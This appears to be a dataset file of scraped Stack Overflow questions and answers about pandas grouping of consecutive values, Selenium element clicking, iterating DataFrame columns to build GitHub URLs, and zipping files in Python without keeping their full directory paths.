[ 1, 1, 1 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074591735_dataframe_pandas_python.txt
Q: group DataFrame and increment group id if the number of rows have 3 consecutives same value I have a data frame that looks as follows: import pandas as pd max_skip=2 data = {'col1':['NT', 'NT', 'NT', 'T','T','T','NT', 'NT', 'T','T','T','NT', 'NT', 'NT',"T",'T','T','T','NT','NT']} # Create DataFrame df = pd.DataFrame(data) df I would like to group those data with the following rule: If the number of consecutive NT is more than max_skip, assign those rows to group 0 else assign those rows to the current group id (group id starts from 0) The next row will have its group id incremented if the previous row contains more than 2 (max_skip) consecutive NT, otherwise, the group id will still be the same. which need to give me the following result. But how could I achieve this with any available built-in function without having to loop each of the rows? df['group']=[0,0,0,1,1,1,1,1,1,1,1,0,0,0,2,2,2,2,2,2] A: I believe this can be done with one line, but it works. df['lenghts'] = df.groupby(((df.col1 != df.col1.shift())).cumsum()).transform('size') df['group']=df.groupby(np.where((df['col1']=='NT') & (df['lenghts']>max_skip),0,1)).ngroup() df['cumsum_']=df.groupby(['group'])['group'].cumsum() df['group']=np.where((df['group']==0),0,((df.cumsum_ != df.cumsum_.shift() + 1)).cumsum()) df['group']=df.groupby(['group']).ngroup() df=df.drop(['lenghts','cumsum_'],axis=1) print(df) ''' col1 group 0 NT 0 1 NT 0 2 NT 0 3 T 1 4 T 1 5 T 1 6 NT 1 7 NT 1 8 T 1 9 T 1 10 T 1 11 NT 0 12 NT 0 13 NT 0 14 T 2 15 T 2 16 T 2 17 T 2 18 NT 2 19 NT 2 Details: #Let's take how many times each value in col1 is repeated. df['lenghts'] = df.groupby(((df.col1 != df.col1.shift())).cumsum()).transform('size') print(df) ''' col1 lenghts 0 NT 3 1 NT 3 2 NT 3 3 T 3 4 T 3 5 T 3 6 NT 2 7 NT 2 8 T 3 9 T 3 10 T 3 11 NT 3 12 NT 3 13 NT 3 14 T 4 15 T 4 16 T 4 17 T 4 18 NT 2 19 NT 2 ''' # now, write as 0 if col1 is NT and lenght is greater than "max_skip" df['group']=df.groupby(np.where((df['col1']=='NT') & (df['lenghts']>max_skip),0,1)).ngroup() ''' col1 lenghts group 0 NT 3 0 1 NT 3 0 2 NT 3 0 3 T 3 1 4 T 3 1 5 T 3 1 6 NT 2 1 7 NT 2 1 8 T 3 1 9 T 3 1 10 T 3 1 11 NT 3 0 12 NT 3 0 13 NT 3 0 14 T 4 1 15 T 4 1 16 T 4 1 17 T 4 1 18 NT 2 1 19 NT 2 1 ''' #then we get the cumulative sum of the group column. If the group is 0, not 0, we define a new id with the code "df.cumsum_ != df.cumsum_.shift() + 1". df['cumsum_']=df.groupby(['group'])['group'].cumsum() df['group']=np.where((df['group']==0),0,((df.cumsum_ != df.cumsum_.shift() + 1)).cumsum()) ''' col1 lenghts group cumsum_ 0 NT 3 0 0 1 NT 3 0 0 2 NT 3 0 0 3 T 3 3 1 4 T 3 3 2 5 T 3 3 3 6 NT 2 3 4 7 NT 2 3 5 8 T 3 3 6 9 T 3 3 7 10 T 3 3 8 11 NT 3 0 0 12 NT 3 0 0 13 NT 3 0 0 14 T 4 7 9 15 T 4 7 10 16 T 4 7 11 17 T 4 7 12 18 NT 2 7 13 19 NT 2 7 14 ''' #It remains to define a new id according to the group column. df['group']=df.groupby(['group']).ngroup()
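The same grouping can be written a little more compactly. A sketch, with one assumption spelled out: like the expected output, it presumes the series starts with a long NT run; if the data could start with a kept block, add 1 to block so it does not collide with the 0 reserved for long NT runs.
import numpy as np
import pandas as pd

run_id = (df.col1 != df.col1.shift()).cumsum()           # label consecutive runs
run_len = df.groupby(run_id)['col1'].transform('size')   # length of each run
is_break = (df.col1 == 'NT') & (run_len > max_skip)      # long NT runs -> group 0
block = (is_break & ~is_break.shift(fill_value=False)).cumsum()
df['group'] = np.where(is_break, 0, block)

On the sample data this reproduces [0,0,0,1,1,1,1,1,1,1,1,0,0,0,2,2,2,2,2,2] exactly.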
group DataFrame and increment group id if the number of rows have 3 consecutives same value
I have a data frame that looks as follows: import pandas as pd max_skip=2 data = {'col1':['NT', 'NT', 'NT', 'T','T','T','NT', 'NT', 'T','T','T','NT', 'NT', 'NT',"T",'T','T','T','NT','NT']} # Create DataFrame df = pd.DataFrame(data) df I would like to group those data with the following rule: If the number of consecutive NT is more than max_skip, assign those rows to group 0 else assign those rows to the current group id (group id starts from 0) The next row will have its group id incremented if the previous row contains more than 2 (max_skip) consecutive NT, otherwise, the group id will still be the same. which need to give me the following result. But how could I achieve this with any available built-in function without having to loop each of the rows? df['group']=[0,0,0,1,1,1,1,1,1,1,1,0,0,0,2,2,2,2,2,2]
[ "I believe this can be done with one line, but it works.\ndf['lenghts'] = df.groupby(((df.col1 != df.col1.shift())).cumsum()).transform('size')\ndf['group']=df.groupby(np.where((df['col1']=='NT') & (df['lenghts']>max_skip),0,1)).ngroup()\ndf['cumsum_']=df.groupby(['group'])['group'].cumsum()\ndf['group']=np.where((df['group']==0),0,((df.cumsum_ != df.cumsum_.shift() + 1)).cumsum())\ndf['group']=df.groupby(['group']).ngroup()\ndf=df.drop(['lenghts','cumsum_'],axis=1)\nprint(df)\n'''\n col1 group\n0 NT 0\n1 NT 0\n2 NT 0\n3 T 1\n4 T 1\n5 T 1\n6 NT 1\n7 NT 1\n8 T 1\n9 T 1\n10 T 1\n11 NT 0\n12 NT 0\n13 NT 0\n14 T 2\n15 T 2\n16 T 2\n17 T 2\n18 NT 2\n19 NT 2\n\nDetails:\n#Let's take how many times each value in col1 is repeated.\ndf['lenghts'] = df.groupby(((df.col1 != df.col1.shift())).cumsum()).transform('size')\nprint(df)\n'''\n col1 lenghts\n0 NT 3\n1 NT 3\n2 NT 3\n3 T 3\n4 T 3\n5 T 3\n6 NT 2\n7 NT 2\n8 T 3\n9 T 3\n10 T 3\n11 NT 3\n12 NT 3\n13 NT 3\n14 T 4\n15 T 4\n16 T 4\n17 T 4\n18 NT 2\n19 NT 2\n'''\n\n# now, write as 0 if col1 is NT and lenght is greater than \"max_skip\"\ndf['group']=df.groupby(np.where((df['col1']=='NT') & (df['lenghts']>max_skip),0,1)).ngroup() \n\n'''\n col1 lenghts group\n0 NT 3 0\n1 NT 3 0\n2 NT 3 0\n3 T 3 1\n4 T 3 1\n5 T 3 1\n6 NT 2 1\n7 NT 2 1\n8 T 3 1\n9 T 3 1\n10 T 3 1\n11 NT 3 0\n12 NT 3 0\n13 NT 3 0\n14 T 4 1\n15 T 4 1\n16 T 4 1\n17 T 4 1\n18 NT 2 1\n19 NT 2 1\n'''\n#then we get the cumulative sum of the group column. If the group is 0, not 0, we define a new id with the code \"df.cumsum_ != df.cumsum_.shift() + 1\".\n\ndf['cumsum_']=df.groupby(['group'])['group'].cumsum()\ndf['group']=np.where((df['group']==0),0,((df.cumsum_ != df.cumsum_.shift() + 1)).cumsum())\n\n'''\n col1 lenghts group cumsum_\n0 NT 3 0 0\n1 NT 3 0 0\n2 NT 3 0 0\n3 T 3 3 1\n4 T 3 3 2\n5 T 3 3 3\n6 NT 2 3 4\n7 NT 2 3 5\n8 T 3 3 6\n9 T 3 3 7\n10 T 3 3 8\n11 NT 3 0 0\n12 NT 3 0 0\n13 NT 3 0 0\n14 T 4 7 9\n15 T 4 7 10\n16 T 4 7 11\n17 T 4 7 12\n18 NT 2 7 13\n19 NT 2 7 14\n'''\n#It remains to define a new id according to the group column.\ndf['group']=df.groupby(['group']).ngroup()\n\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074587652_dataframe_pandas_python.txt
Q: How do I click on an item on my google search page with Selenium Python? Good time of the day! I am faced with a seemingly simple problem, but it's been a while, and I'm asking for your help. I work with Selenium in Python and I need to click about 20 items on a Google search page for a random query. I'll give an example of the elements below; the bottom line is that once the elements are revealed, Google generates new such elements.
Problem: I cannot click on the element. I need to click on the existing and then on the newly generated elements in this block: click to open, see blocks with element
Tried to click on the xpath, having collected all the elements:
xpath = '//*[@id="qmCCY_adG4Sj3QP025p4__16"]/div/div/div[1]/div[4]'
all_elements = driver.find_element(By.XPATH, value=xpath)
for element in all_elements:
    element.click()
    sleep(2)

Important note! The id in the xpath is constantly changing and is regenerated on the Google side.
Tried to click on the class class="r21Kzd"
Tried to click on the selector: #qmCCY_adG4Sj3QP025p4__16 > div > div > div > div.wWOJcd > div.r21Kzd
Errors
This is when I try to click using xpath:
Message: no such element: Unable to locate element: {"method":"xpath","selector"://*[@id="vU-CY7u3C8PIrgTuuJH4CQ_9"]/div/div[1]/div[4]}

In other cases, the story is almost the same: the driver does not find the element and cannot click on it.
Below I attach a screenshot of the tag I need to click: screenshot tags on google search
Thanks for the help!
A: In case iDjcJe IX9Lgd wwB5gf are fixed class name values of that element, all you need is to use CSS_SELECTOR instead of CLASS_NAME with correct CSS selector syntax.
So, instead of driver.find_element(By.CLASS_NAME, "iDjcJe IX9Lgd wwB5gf") try using this:
driver.find_element(By.CSS_SELECTOR, ".iDjcJe.IX9Lgd.wwB5gf")

(dots before each class name, no spaces between them)
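For clicking the roughly twenty items, including the ones Google injects after each click, something along these lines may work. It is a sketch only: the class name .iDjcJe.IX9Lgd.wwB5gf is assumed to stay stable during the session (Google does not guarantee that), and driver is the WebDriver instance from the question.
import time

from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import StaleElementReferenceException

wait = WebDriverWait(driver, 10)
clicked = set()
for _ in range(20):
    buttons = wait.until(EC.presence_of_all_elements_located(
        (By.CSS_SELECTOR, ".iDjcJe.IX9Lgd.wwB5gf")))
    fresh = [b for b in buttons if b.id not in clicked]  # only not-yet-clicked items
    if not fresh:
        break
    try:
        fresh[0].click()
        clicked.add(fresh[0].id)
    except StaleElementReferenceException:
        continue  # the DOM was re-rendered; re-query on the next pass
    time.sleep(1)

Re-querying inside the loop is what picks up the newly generated elements, and tracking the internal WebElement ids avoids clicking the same button twice.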
How do I click on an item on my google search page with Selenium Python?
Good time of the day! Faced with a seemingly simple problem, But it’s been a while, and I’m asking for your help. I work with Selenium on Python and I need to curse about 20 items on google search page by random request. And I’ll give you an example of the elements below, and the bottom line is, once the elements are revealed, Google generates new such elements Problem: Cannot click on the element. I will need to click on existing and then on new, generated elements in this block: click for open see blocks with element Tried to click on xpath, having collected all the elements: xpath = '//*[@id="qmCCY_adG4Sj3QP025p4__16"]/div/div/div[1]/div[4]' all_elements = driver.find_element(By.XPATH, value=xpath) for element in all_elements: element.click() sleep(2) Important note! id xpath has constantly changing and is generated by another on the google side Tried to click on the class class="r21Kzd" Tried to click on the selector: #qmCCY_adG4Sj3QP025p4__16 > div > div > div > div.wWOJcd > div.r21Kzd Errors This is when I try to click using xpath: Message: no such element: Unable to locate element: {"method":"xpath","selector"://*[@id="vU-CY7u3C8PIrgTuuJH4CQ_9"]/div/div[1]/div[4]} In other cases, the story is almost the same, the driver does not find the element and cannot click on it. Below I apply a scratch tag on which I need to click screenshot tags on google search Thanks for the help!
[ "In case iDjcJe IX9Lgd wwB5gf are a fixed class name values of that element all you need is to use CSS_SELECTOR instead of CLASS_NAME with a correct syntax of CSS Selectors.\nSo, instead of driver.find_element(By.CLASS_NAME, \"iDjcJe IX9Lgd wwB5gf\") try using this:\ndriver.find_element(By.CSS_SELECTOR, \".iDjcJe.IX9Lgd.wwB5gf\")\n\n(dots before each class name, no spaces between them)\n" ]
[ 0 ]
[]
[]
[ "css_selectors", "python", "selenium", "selenium_chromedriver", "selenium_webdriver" ]
stackoverflow_0074585644_css_selectors_python_selenium_selenium_chromedriver_selenium_webdriver.txt
Q: Pandas for-loop with a list of columns I'm trying to open links in my dataframe using selenium webdriver, the dataframe 'df1' looks like this: user repo1 repo2 repo3 0 breed cs149-f22 kattis2canvas grpc-maven-skeleton 1 GrahamDumpleton mod_wsgi wrapt NaN The links I want to open include the content in column 'user' and one of 3 'repo' columns. I encounter a bug when I iterate the 'repo' columns. Could anyone help me out? Thank you! Here is my best try: repo_cols = [col for col in df1.columns if 'repo' in col] for index, row in df1.iterrows(): user = row['user'] for repo_name in repo_cols: try: repo = row['repo_name'] current_url = f'https://github.com/{user}/{repo}/graphs/contributors' driver.get(current_url) time.sleep(0.5) except: pass Here is the bug I encounter: KeyError: 'repo_name' --------------------------------------------------------------------------- KeyError Traceback (most recent call last) ~\anaconda3\lib\site-packages\pandas\core\indexes\base.py in get_loc(self, key, method, tolerance) 3079 try: -> 3080 return self._engine.get_loc(casted_key) 3081 except KeyError as err: pandas\_libs\index.pyx in pandas._libs.index.IndexEngine.get_loc() pandas\_libs\index.pyx in pandas._libs.index.IndexEngine.get_loc() pandas\_libs\hashtable_class_helper.pxi in pandas._libs.hashtable.PyObjectHashTable.get_item() pandas\_libs\hashtable_class_helper.pxi in pandas._libs.hashtable.PyObjectHashTable.get_item() KeyError: 'repo_name' The above exception was the direct cause of the following exception: KeyError Traceback (most recent call last) <ipython-input-50-eb068230c3fd> in <module> 4 user = row['user'] 5 for repo_name in repo_cols: ----> 6 repo = row['repo_name'] 7 current_url = f'https://github.com/{user}/{repo}/graphs/contributors' 8 driver.get(current_url) ~\anaconda3\lib\site-packages\pandas\core\series.py in __getitem__(self, key) 851 852 elif key_is_scalar: --> 853 return self._get_value(key) 854 855 if is_hashable(key): ~\anaconda3\lib\site-packages\pandas\core\series.py in _get_value(self, label, takeable) 959 960 # Similar to Index.get_value, but we do not fall back to positional --> 961 loc = self.index.get_loc(label) 962 return self.index._get_values_for_loc(self, loc, label) 963 ~\anaconda3\lib\site-packages\pandas\core\indexes\base.py in get_loc(self, key, method, tolerance) 3080 return self._engine.get_loc(casted_key) 3081 except KeyError as err: -> 3082 raise KeyError(key) from err 3083 3084 if tolerance is not None: KeyError: 'repo_name' A: You're getting the KeyError because there is no column named repro_name. You need to replace row['repo_name'] with row[repo_name]. Try this : import pandas as pd from selenium import webdriver df1= pd.DataFrame({'user': ['breed', 'GrahamDumpleton'], 'repo1': ['cs149-f22', 'mod_wsgi'], 'repo2': ['kattis2canvas', 'wrapt']}) repo_cols = [col for col in df1.columns if 'repo' in col] for index, row in df1.iterrows(): user = row['user'] for repo_name in repo_cols: try: repo = row[repo_name] browser=webdriver.Chrome() current_url = f'https://github.com/{user}/{repo}/graphs/contributors' browser.get(current_url) time.sleep(0.5) except: pass A: I think you should remove the quotation mark on the: repo = row['repo_name'] It should be: repo = row[repo_name]
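Since repo3 is NaN for some users in the sample frame, a variant that also skips missing repositories may help. A sketch that reuses driver and repo_cols from the question:
import time

import pandas as pd

for _, row in df1.iterrows():
    user = row['user']
    for repo in row[repo_cols]:   # the repo1..repo3 values for this row
        if pd.isna(repo):         # e.g. repo3 is NaN for GrahamDumpleton
            continue
        driver.get(f'https://github.com/{user}/{repo}/graphs/contributors')
        time.sleep(0.5)

Skipping NaN explicitly also removes the need for the bare try/except pass, which would otherwise hide real errors.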
Pandas for-loop with a list of columns
I'm trying to open links in my dataframe using selenium webdriver, the dataframe 'df1' looks like this: user repo1 repo2 repo3 0 breed cs149-f22 kattis2canvas grpc-maven-skeleton 1 GrahamDumpleton mod_wsgi wrapt NaN The links I want to open include the content in column 'user' and one of 3 'repo' columns. I encounter a bug when I iterate the 'repo' columns. Could anyone help me out? Thank you! Here is my best try: repo_cols = [col for col in df1.columns if 'repo' in col] for index, row in df1.iterrows(): user = row['user'] for repo_name in repo_cols: try: repo = row['repo_name'] current_url = f'https://github.com/{user}/{repo}/graphs/contributors' driver.get(current_url) time.sleep(0.5) except: pass Here is the bug I encounter: KeyError: 'repo_name' --------------------------------------------------------------------------- KeyError Traceback (most recent call last) ~\anaconda3\lib\site-packages\pandas\core\indexes\base.py in get_loc(self, key, method, tolerance) 3079 try: -> 3080 return self._engine.get_loc(casted_key) 3081 except KeyError as err: pandas\_libs\index.pyx in pandas._libs.index.IndexEngine.get_loc() pandas\_libs\index.pyx in pandas._libs.index.IndexEngine.get_loc() pandas\_libs\hashtable_class_helper.pxi in pandas._libs.hashtable.PyObjectHashTable.get_item() pandas\_libs\hashtable_class_helper.pxi in pandas._libs.hashtable.PyObjectHashTable.get_item() KeyError: 'repo_name' The above exception was the direct cause of the following exception: KeyError Traceback (most recent call last) <ipython-input-50-eb068230c3fd> in <module> 4 user = row['user'] 5 for repo_name in repo_cols: ----> 6 repo = row['repo_name'] 7 current_url = f'https://github.com/{user}/{repo}/graphs/contributors' 8 driver.get(current_url) ~\anaconda3\lib\site-packages\pandas\core\series.py in __getitem__(self, key) 851 852 elif key_is_scalar: --> 853 return self._get_value(key) 854 855 if is_hashable(key): ~\anaconda3\lib\site-packages\pandas\core\series.py in _get_value(self, label, takeable) 959 960 # Similar to Index.get_value, but we do not fall back to positional --> 961 loc = self.index.get_loc(label) 962 return self.index._get_values_for_loc(self, loc, label) 963 ~\anaconda3\lib\site-packages\pandas\core\indexes\base.py in get_loc(self, key, method, tolerance) 3080 return self._engine.get_loc(casted_key) 3081 except KeyError as err: -> 3082 raise KeyError(key) from err 3083 3084 if tolerance is not None: KeyError: 'repo_name'
[ "You're getting the KeyError because there is no column named repro_name.\nYou need to replace row['repo_name'] with row[repo_name].\nTry this :\nimport pandas as pd\nfrom selenium import webdriver\n\ndf1= pd.DataFrame({'user': ['breed', 'GrahamDumpleton'],\n 'repo1': ['cs149-f22', 'mod_wsgi'],\n 'repo2': ['kattis2canvas', 'wrapt']})\n\nrepo_cols = [col for col in df1.columns if 'repo' in col]\n\nfor index, row in df1.iterrows():\n user = row['user']\n for repo_name in repo_cols:\n try:\n repo = row[repo_name]\n browser=webdriver.Chrome()\n current_url = f'https://github.com/{user}/{repo}/graphs/contributors'\n browser.get(current_url)\n time.sleep(0.5)\n except:\n pass\n\n", "I think you should remove the quotation mark on the:\n\nrepo = row['repo_name']\n\nIt should be:\n\nrepo = row[repo_name]\n\n" ]
[ 0, 0 ]
[]
[]
[ "for_loop", "pandas", "python", "selenium_webdriver" ]
stackoverflow_0074592293_for_loop_pandas_python_selenium_webdriver.txt
Q: zip file and avoid directory structure I have a Python script that zips a file (new.txt): tofile = "/root/files/result/"+file targetzipfile = new.zip # This is how I want my zip to look like zf = zipfile.ZipFile(targetzipfile, mode='w') try: #adding to archive zf.write(tofile) finally: zf.close() When I do this I get the zip file. But when I try to unzip the file I get the text file inside of a series of directories corresponding to the path of the file i.e I see a folder called root in the result directory and more directories within it, i.e. I have /root/files/result/new.zip and when I unzip new.zip I have a directory structure that looks like /root/files/result/root/files/result/new.txt Is there a way I can zip such that when I unzip I only get new.txt? In other words I have /root/files/result/new.zip and when I unzip new.zip, it should look like /root/files/results/new.txt A: The zipfile.write() method takes an optional arcname argument that specifies what the name of the file should be inside the zipfile I think you need to do a modification for the destination, otherwise it will duplicate the directory. Use :arcname to avoid it. try like this: import os import zipfile def zip(src, dst): zf = zipfile.ZipFile("%s.zip" % (dst), "w", zipfile.ZIP_DEFLATED) abs_src = os.path.abspath(src) for dirname, subdirs, files in os.walk(src): for filename in files: absname = os.path.abspath(os.path.join(dirname, filename)) arcname = absname[len(abs_src) + 1:] print 'zipping %s as %s' % (os.path.join(dirname, filename), arcname) zf.write(absname, arcname) zf.close() zip("src", "dst") A: zf.write(tofile) to change zf.write(tofile, zipfile_dir) for example zf.write("/root/files/result/root/files/result/new.txt", "/root/files/results/new.txt") A: To illustrate most clearly, directory structure: /Users └── /user . ├── /pixmaps . │ ├── pixmap_00.raw . │ ├── pixmap_01.raw │ ├── /jpeg │ │ ├── pixmap_00.jpg │ │ └── pixmap_01.jpg │ └── /png │ ├── pixmap_00.png │ └── pixmap_01.png ├── /docs ├── /programs ├── /misc . . . Directory of interest: /Users/user/pixmaps First attemp import os import zipfile TARGET_DIRECTORY = "/Users/user/pixmaps" ZIPFILE_NAME = "CompressedDir.zip" def zip_dir(directory, zipname): """ Compress a directory (ZIP file). """ if os.path.exists(directory): outZipFile = zipfile.ZipFile(zipname, 'w', zipfile.ZIP_DEFLATED) for dirpath, dirnames, filenames in os.walk(directory): for filename in filenames: filepath = os.path.join(dirpath, filename) outZipFile.write(filepath) outZipFile.close() if __name__ == '__main__': zip_dir(TARGET_DIRECTORY, ZIPFILE_NAME) ZIP file structure: CompressedDir.zip . └── /Users └── /user └── /pixmaps ├── pixmap_00.raw ├── pixmap_01.raw ├── /jpeg │ ├── pixmap_00.jpg │ └── pixmap_01.jpg └── /png ├── pixmap_00.png └── pixmap_01.png Avoiding the full directory path def zip_dir(directory, zipname): """ Compress a directory (ZIP file). """ if os.path.exists(directory): outZipFile = zipfile.ZipFile(zipname, 'w', zipfile.ZIP_DEFLATED) # The root directory within the ZIP file. rootdir = os.path.basename(directory) for dirpath, dirnames, filenames in os.walk(directory): for filename in filenames: # Write the file named filename to the archive, # giving it the archive name 'arcname'. 
filepath = os.path.join(dirpath, filename) parentpath = os.path.relpath(filepath, directory) arcname = os.path.join(rootdir, parentpath) outZipFile.write(filepath, arcname) outZipFile.close() if __name__ == '__main__': zip_dir(TARGET_DIRECTORY, ZIPFILE_NAME) ZIP file structure: CompressedDir.zip . └── /pixmaps ├── pixmap_00.raw ├── pixmap_01.raw ├── /jpeg │ ├── pixmap_00.jpg │ └── pixmap_01.jpg └── /png ├── pixmap_00.png └── pixmap_01.png A: The arcname parameter in the write method specifies what will be the name of the file inside the zipfile: import os import zipfile # 1. Create a zip file which we will write files to zip_file = "/home/username/test.zip" zipf = zipfile.ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED) # 2. Write files found in "/home/username/files/" to the test.zip files_to_zip = "/home/username/files/" for file_to_zip in os.listdir(files_to_zip): file_to_zip_full_path = os.path.join(files_to_zip, file_to_zip) # arcname argument specifies what will be the name of the file inside the zipfile zipf.write(filename=file_to_zip_full_path, arcname=file_to_zip) zipf.close() A: Check out the documentation for Zipfile.write. ZipFile.write(filename[, arcname[, compress_type]]) Write the file named filename to the archive, giving it the archive name arcname (by default, this will be the same as filename, but without a drive letter and with leading path separators removed) https://docs.python.org/2/library/zipfile.html#zipfile.ZipFile.write Try the following: import zipfile import os filename = 'foo.txt' # Using os.path.join is better than using '/' it is OS agnostic path = os.path.join(os.path.sep, 'tmp', 'bar', 'baz', filename) zip_filename = os.path.splitext(filename)[0] + '.zip' zip_path = os.path.join(os.path.dirname(path), zip_filename) # If you need exception handling wrap this in a try/except block with zipfile.ZipFile(zip_path, 'w') as zf: zf.write(path, zip_filename) The bottom line is that if you do not supply an archive name then the filename is used as the archive name and it will contain the full path to the file. A: You can isolate just the file name of your sources files using: name_file_only= name_full_path.split(os.sep)[-1] For example, if name_full_path is /root/files/results/myfile.txt, then name_file_only will be myfile.txt. To zip myfile.txt to the root of the archive zf, you can then use: zf.write(name_full_path, name_file_only) A: It is much simpler than expected, I configured the module using the parameter "arcname" as "file_to_be_zipped.txt", so the folders do not appear in my final zipped file: mmpk_zip_file = zipfile.ZipFile("c:\\Destination_folder_name\newzippedfilename.zip", mode='w', compression=zipfile.ZIP_DEFLATED) mmpk_zip_file.write("c:\\Source_folder_name\file_to_be_zipped.txt", "file_to_be_zipped.txt") mmpk_zip_file.close() A: We can use this import os # single File os.system(f"cd {destinationFolder} && zip fname.zip fname") # directory os.system(f"cd {destinationFolder} && zip -r folder.zip folder") For me, This is working. A: Specify the arcname input of the write method as following: tofile = "/root/files/result/"+file NewRoot = "files/result/" zf.write(tofile, arcname=tofile.split(NewRoot)[1]) More info: ZipFile.write(filename, arcname=None, compress_type=None, compresslevel=None) https://docs.python.org/3/library/zipfile.html A: I face the same problem and i solve it with writestr. 
You can use it like this: zipObject.writestr(<filename> , <file data, bytes or string>) A: If you want an elegant way to do it with pathlib you can use it this way: from pathlib import Path import zipfile def zip_dir(path_to_zip: Path): zip_file = Path(path_to_zip).with_suffix('.zip') z = zipfile.ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED) for f in list(path_to_zip.rglob('*.*')): z.write(f, arcname=f.relative_to(path_to_zip)) A: To get rid of the absolute path, I came up with this: def create_zip(root_path, file_name, ignored=[], storage_path=None): """Create a ZIP This function creates a ZIP file of the provided root path. Args: root_path (str): Root path to start from when picking files and directories. file_name (str): File name to save the created ZIP file as. ignored (list): A list of files and/or directories that you want to ignore. This selection is applied in root directory only. storage_path: If provided, ZIP file will be placed in this location. If None, the ZIP will be created in root_path """ if storage_path is not None: zip_root = os.path.join(storage_path, file_name) else: zip_root = os.path.join(root_path, file_name) zipf = zipfile.ZipFile(zip_root, 'w', zipfile.ZIP_DEFLATED) def iter_subtree(path, layer=0): # iter the directory path = Path(path) for p in path.iterdir(): if layer == 0 and p.name in ignored: continue zipf.write(p, str(p).replace(root_path, '').lstrip('/')) if p.is_dir(): iter_subtree(p, layer=layer+1) iter_subtree(root_path) zipf.close() Maybe it isn't the most elegant solution, but this works. If we just use p.name when providing the file name to write() method, then it doesn't create the proper directory structure. Moreover, if it's needed to ignore the selected directories or files from the root path, this ignores those selections too. A: This is an example I used. I have one excel file, Treport where I am using python + pandas in my dowork function to create pivot tables, etc. for each of the companies in CompanyNames. I create a zip file of the csv and a non-zip file so I can check as well. The writer specifies the path where I want my .xlsx to go and for my zip files, I specify that in the zip.write(). I just specify the name of the xlsx file that was recently created, and that is what gets zipped up, not the whole directory. Beforehand I was just specifying 'writer' and would zip up the whole directory. This allows me to zip up just the recently created excel file. Treport = 'TestReportData.csv' CompanyNames = ['Company1','Company2','Company3'] for CompName in CompanyNames: strcomp = str(CompName) #Writer Creates pathway to output report to. Each company gets unique file. writer = pd.ExcelWriter(f"C:\\Users\\MyUser\\Documents\\{strcomp}addReview.xlsx", engine='xlsxwriter') DoWorkFunction(CompName, Treport, writer) writer.save() with ZipFile(f"C:\\Users\\MyUser\\Documents\\{strcomp}addR.zip", 'w') as zip: zip.write(writer, f"{strcomp}addReview.xlsx")
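Distilling the arcname idea from the answers above into a single-file helper, a minimal sketch using the question's paths:
import os
import zipfile


def zip_single_file(path, zip_path=None):
    # Store only the base name so unzipping yields new.txt, not root/files/...
    zip_path = zip_path or os.path.splitext(path)[0] + '.zip'
    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:
        zf.write(path, arcname=os.path.basename(path))
    return zip_path


zip_single_file('/root/files/result/new.txt')  # new.zip contains just new.txt

Unzipping the result yields new.txt directly, with no /root/files/result/ prefix inside the archive.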
zip file and avoid directory structure
I have a Python script that zips a file (new.txt): tofile = "/root/files/result/"+file targetzipfile = new.zip # This is how I want my zip to look like zf = zipfile.ZipFile(targetzipfile, mode='w') try: #adding to archive zf.write(tofile) finally: zf.close() When I do this I get the zip file. But when I try to unzip the file I get the text file inside of a series of directories corresponding to the path of the file i.e I see a folder called root in the result directory and more directories within it, i.e. I have /root/files/result/new.zip and when I unzip new.zip I have a directory structure that looks like /root/files/result/root/files/result/new.txt Is there a way I can zip such that when I unzip I only get new.txt? In other words I have /root/files/result/new.zip and when I unzip new.zip, it should look like /root/files/results/new.txt
[ "The zipfile.write() method takes an optional arcname argument that specifies what the name of the file should be inside the zipfile\nI think you need to do a modification for the destination, otherwise it will duplicate the directory. Use :arcname to avoid it. try like this:\nimport os\nimport zipfile\n\ndef zip(src, dst):\n zf = zipfile.ZipFile(\"%s.zip\" % (dst), \"w\", zipfile.ZIP_DEFLATED)\n abs_src = os.path.abspath(src)\n for dirname, subdirs, files in os.walk(src):\n for filename in files:\n absname = os.path.abspath(os.path.join(dirname, filename))\n arcname = absname[len(abs_src) + 1:]\n print 'zipping %s as %s' % (os.path.join(dirname, filename),\n arcname)\n zf.write(absname, arcname)\n zf.close()\n\nzip(\"src\", \"dst\")\n\n", "zf.write(tofile)\n\nto change\nzf.write(tofile, zipfile_dir)\n\nfor example\nzf.write(\"/root/files/result/root/files/result/new.txt\", \"/root/files/results/new.txt\")\n\n", "To illustrate most clearly,\ndirectory structure:\n/Users\n └── /user\n . ├── /pixmaps\n . │ ├── pixmap_00.raw\n . │ ├── pixmap_01.raw\n │ ├── /jpeg\n │ │ ├── pixmap_00.jpg\n │ │ └── pixmap_01.jpg\n │ └── /png\n │ ├── pixmap_00.png\n │ └── pixmap_01.png\n ├── /docs\n ├── /programs\n ├── /misc\n .\n .\n .\n\nDirectory of interest: /Users/user/pixmaps\nFirst attemp\nimport os\nimport zipfile\n\nTARGET_DIRECTORY = \"/Users/user/pixmaps\"\nZIPFILE_NAME = \"CompressedDir.zip\"\n\ndef zip_dir(directory, zipname):\n \"\"\"\n Compress a directory (ZIP file).\n \"\"\"\n if os.path.exists(directory):\n outZipFile = zipfile.ZipFile(zipname, 'w', zipfile.ZIP_DEFLATED)\n\n for dirpath, dirnames, filenames in os.walk(directory):\n for filename in filenames:\n\n filepath = os.path.join(dirpath, filename)\n outZipFile.write(filepath)\n\n outZipFile.close()\n\n\n\n\nif __name__ == '__main__':\n zip_dir(TARGET_DIRECTORY, ZIPFILE_NAME)\n\nZIP file structure:\nCompressedDir.zip\n.\n└── /Users\n └── /user\n └── /pixmaps\n ├── pixmap_00.raw\n ├── pixmap_01.raw\n ├── /jpeg\n │ ├── pixmap_00.jpg\n │ └── pixmap_01.jpg\n └── /png\n ├── pixmap_00.png\n └── pixmap_01.png\n\nAvoiding the full directory path\ndef zip_dir(directory, zipname):\n \"\"\"\n Compress a directory (ZIP file).\n \"\"\"\n if os.path.exists(directory):\n outZipFile = zipfile.ZipFile(zipname, 'w', zipfile.ZIP_DEFLATED)\n\n # The root directory within the ZIP file.\n rootdir = os.path.basename(directory)\n\n for dirpath, dirnames, filenames in os.walk(directory):\n for filename in filenames:\n\n # Write the file named filename to the archive,\n # giving it the archive name 'arcname'.\n filepath = os.path.join(dirpath, filename)\n parentpath = os.path.relpath(filepath, directory)\n arcname = os.path.join(rootdir, parentpath)\n\n 